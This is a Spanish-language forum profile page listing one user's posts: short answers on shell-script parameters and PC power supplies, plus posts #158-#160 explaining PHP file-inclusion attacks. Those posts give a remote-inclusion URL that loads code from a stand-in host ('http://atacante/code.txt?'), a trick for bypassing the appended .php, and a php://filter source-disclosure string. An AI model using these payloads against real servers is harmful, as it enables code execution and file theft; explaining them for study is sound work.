Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - T. Collins

#151
Scripting / Re: Poner parametros en shell
2 Febrero 2015, 23:36 PM
$1 = -u  y $2 = usuario
#152
Scripting / Re: Poner parametros en shell
2 Febrero 2015, 23:30 PM
Los parametros que le pasas puedes utilizarlos con $1, $2, $3...
#153
Scripting / Re: Poner parametros en shell
2 Febrero 2015, 23:18 PM
En que lenguaje?
#154
Dónde miras lo que consume la gŕafica? Lo que he mirado yo pone 400W.  >:(

Vale, eso es el mínimo necesario, no lo que consume.
#155
No me hagas mucho caso porque no sé mucho de esto, pero estás seguro de que esa fuente de 500W es suficiente?
#156
En qué PCI tienes enchufada la gráfica?
#158
El null byte no se puede utilizar.

Con allow_url_include puedes incluir código php desde una url, por ejemplo:
Código (php) [Seleccionar]
include "http://atacante/code.txt";

Por lo tanto, no se trata de incluir http://localhost/r/r.php?pagina=text.txt?, sino http://atacante/code.txt y así ejecutar el código del atacante, que podría ser:
Código (php) [Seleccionar]
echo file_get_contents("archivo.txt");

Para evitar el .php del final basta con poner un ?: http://atacante/code.txt?

Finalmente quedaría así: http://localhost/r/r.php?pagina=http://atacante/code.txt?

Código (php) [Seleccionar]
include "http://atacante/code.txt?.php";
#159
Con allow_url_include no puedes usar %00, pero sí poner urls y ejecutar php ajeno, así es fácil ver archivo.txt
Si tienes algún problema con el .php del final, con poner un ?, el resto se ignora:

http://ejemplo.com/ejemplo.txt? quedaría http://ejemplo.com/ejemplo.txt?.php y se ejecuta el código que hay en ejemplo.txt

Con php://filter puedes ver el código de los php en el servidor y buscar otra vulnerabilidad que te deje ver archivo.txt

php://filter/convert.base64-encode/resource=index quedaría php://filter/convert.base64-encode/resource=index.php por lo que no puedes ver el .txt directamente, pero sí los .php.
#160
Puedes buscar, alternative to null byte en google mismo y sale bastante información. Otra opción es que esté allow_url_include activado, o con php://filter podrías ver los archivos php en base64 por ejemplo y así buscar otra vulnerabilidad.